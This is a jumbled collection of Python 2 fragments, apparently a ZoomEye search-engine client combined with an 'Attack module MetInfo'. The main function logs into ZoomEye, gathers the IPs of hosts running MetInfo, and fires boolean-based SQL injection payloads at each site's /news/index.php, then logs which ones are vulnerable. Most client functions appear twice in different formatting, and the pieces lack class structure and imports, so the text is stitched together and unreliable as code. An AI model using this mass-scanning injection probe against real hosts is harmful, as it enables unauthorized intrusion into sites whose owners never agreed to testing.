def _setAdvancedSearchArgs(self):
"""
参数可以是列表也可是字符串,但字符串必须以逗号或空格分割
app:组件名包含
ver:版本等于
os:操作系统为
country:国家为
city:城市为
device:设备类型为
port:端口号为
hostname:主机名包含
services:服务类型为
ip:IP 地址为
cidr:IP 的 CIDR 网段
site:域名包含
desc:关键词包含
keywords:描述包含
"""
tmp = ""
flag = False
for _ in self.advancedSearchArgs.items():
if _[0] in ZOOMEYE_ADVANCED_ARGS.ARGS.keys():
tmp += self._setAdvancedSearch(_[0],_[1])
flag = True
else:
logger.error("zoomeye advanced search args type error(app.advancedSearchArgs.{0}=\"{1}\")".format(_[0],_[1]))
logger.debug("you can use there args,like:")
for x in ZOOMEYE_ADVANCED_ARGS.ARGS.items():
logger.debug("{0}:{1}".format(x[0],x[1]))
continue
if not flag:
logger.info("set advanced search args defalut(empty)")
else:
logger.info("zoomeye advanced search args[{0}]".format(tmp))
return tmp
def attack(url):
a = "http://{target}/news/index.php?".format(target=url)
playLoadTrue = "http://{target}/news/index.php?"\
"search_sql=%20123qwe%20"\
"where%201234%3D1234%20--%20x&imgproduct=xxxx".format(target=url)
playLoadFalse = "http://{target}/news/index.php?"\
"serch_sql=%20123qwe%20"\
"where%201234%3D1235%20--%20x&imgproduct=xxxx".format(target=url)
try:
req = urllib2.Request(playLoadTrue)
resp = urllib2.urlopen(req)
if resp.code != 200:
return
data_true = resp.read()
#print data_true
if not re.search(r'href=["\' ]shownews\.php\?lang=', data_true, re.M):
return
req = urllib2.Request(playLoadFalse)
resp = urllib2.urlopen(req)
if resp.code != 200:
return
data_false = resp.read()
#print data_false
if re.search(r'href=["\' ]shownews\.php\?lang=', data_false, re.M):
return
logger.info("%s is vulnerable!" % url)
except:
pass
def webSearch(self,query,facets=None,page=1):
logger.info("zoomeye start searching web")
query += self._setAdvancedSearchArgs()
result = self._baseSearch(ZOOMEYEURL.WEBSEARCHURL,ZOOMEYE_FACETS.WEB,query,facets,page)
logger.info("zoomeye web request request count is {0}".format(len(result["matches"])))
self._clearnAdvancedSearch()
#TODO if result:result["matches"]
return result
def webSearch(self, query, facets=None, page=1):
logger.info("zoomeye start searching web")
query += self._setAdvancedSearchArgs()
result = self._baseSearch(ZOOMEYEURL.WEBSEARCHURL, ZOOMEYE_FACETS.WEB,
query, facets, page)
logger.info("zoomeye web request request count is {0}".format(
len(result["matches"])))
self._clearnAdvancedSearch()
#TODO if result:result["matches"]
return result
def login(self):
logger.info("zoomeye login is running")
data = {
"username" : self.user,
"password" : self.passwd,
}
result = self._getRequests(ZOOMEYEURL.LOGINURL,data)
self.access_token = result["access_token"]
self.header = {'Authorization' : 'JWT ' + self.access_token,}
#logger.debug("access_token:{0}".format(self.access_token))
#logger.debug("header:{0}".format(self.header))
logger.info("zoomeye login successful")
self._checkZoomeyeKey()
def main():
logger.info("Attack module MetInfo is running")
user = ""
passwd = ""
app = ZoomeyeSDK(user,passwd)
ip_list = []
app.login()
result = app.hostSearch("MetInfo",page=1)
ip_list = app.getIp_ZoomeyeSearch(result)
for x in ip_list:
logger.info("find ip:{0}".format(x))
for ip in ip_list:
attack(ip)
def login(self):
logger.info("zoomeye login is running")
data = {
"username": self.user,
"password": self.passwd,
}
result = self._getRequests(ZOOMEYEURL.LOGINURL, data)
self.access_token = result["access_token"]
self.header = {
'Authorization': 'JWT ' + self.access_token,
}
#logger.debug("access_token:{0}".format(self.access_token))
#logger.debug("header:{0}".format(self.header))
logger.info("zoomeye login successful")
self._checkZoomeyeKey()
def _setTarget(self, url, query, facets=None, page=1):
if not facets:
data = {
"query": query,
"page": page,
}
else:
data = {
"query": query,
"page": page,
"facet": facets,
}
target = ("%s?%s") % (url, urllib.urlencode(data))
logger.info("search target:{0}".format(target))
return target
def _setTarget(self,url,query,facets=None,page=1):
if not facets:
data = {
"query" : query,
"page" : page,
}
else:
data = {
"query" : query,
"page" : page,
"facet" : facets,
}
target = ("%s?%s") % (url,urllib.urlencode(data))
logger.info("search target:{0}".format(target))
return target
def _checkArgumentsFacets(self, facetEnums, facets):
if not facets:
return None
if not type(facets) == list:
facets = facets.split(",")
facets = set(x.lower() for x in facets)
total = set(facetEnums)
tmp = facets & total
if len(tmp) == 0:
logger.error("facets can not accent:{0}".format(facets))
logger.error("facets only can accent:{0}".format(total))
logger.error("input facets error.")
logger.info("set default facets empty.")
elif len(tmp) < len(facets):
logger.error("facets can not accent:{0}".format(facets - tmp))
logger.error("facets only can accent:{0}".format(total))
logger.info("set facets:{0}".format(tmp))
facets = ",".join(tmp)
logger.debug("facets:{0}".format(facets))
return facets
def _checkArgumentsFacets(self,facetEnums,facets):
if not facets:
return None
if not type(facets) == list:
facets = facets.split(",")
facets = set(x.lower() for x in facets)
total = set(facetEnums)
tmp = facets & total
if len(tmp) == 0:
logger.error("facets can not accent:{0}".format(facets))
logger.error("facets only can accent:{0}".format(total))
logger.error("input facets error.")
logger.info("set default facets empty.")
elif len(tmp) < len(facets):
logger.error("facets can not accent:{0}".format(facets - tmp))
logger.error("facets only can accent:{0}".format(total))
logger.info("set facets:{0}".format(tmp))
facets = ",".join(tmp)
logger.debug("facets:{0}".format(facets))
return facets
def _setAdvancedSearchArgs(self):
"""
参数可以是列表也可是字符串,但字符串必须以逗号或空格分割
app:组件名包含
ver:版本等于
os:操作系统为
country:国家为
city:城市为
device:设备类型为
port:端口号为
hostname:主机名包含
services:服务类型为
ip:IP 地址为
cidr:IP 的 CIDR 网段
site:域名包含
desc:关键词包含
keywords:描述包含
"""
tmp = ""
flag = False
for _ in self.advancedSearchArgs.items():
if _[0] in ZOOMEYE_ADVANCED_ARGS.ARGS.keys():
tmp += self._setAdvancedSearch(_[0], _[1])
flag = True
else:
logger.error(
"zoomeye advanced search args type error(app.advancedSearchArgs.{0}=\"{1}\")"
.format(_[0], _[1]))
logger.debug("you can use there args,like:")
for x in ZOOMEYE_ADVANCED_ARGS.ARGS.items():
logger.debug("{0}:{1}".format(x[0], x[1]))
continue
if not flag:
logger.info("set advanced search args defalut(empty)")
else:
logger.info("zoomeye advanced search args[{0}]".format(tmp))
return tmp
def resourcesInfo(self):
logger.info("zoomeye recorces info is running")
result = self._getRequests(ZOOMEYEURL.RESOURCESINFOURL)
logger.info("zoomeye resource info:{0}".format(result))
def resourcesInfo(self):
logger.info("zoomeye recorces info is running")
result = self._getRequests(ZOOMEYEURL.RESOURCESINFOURL)
logger.info("zoomeye resource info:{0}".format(result))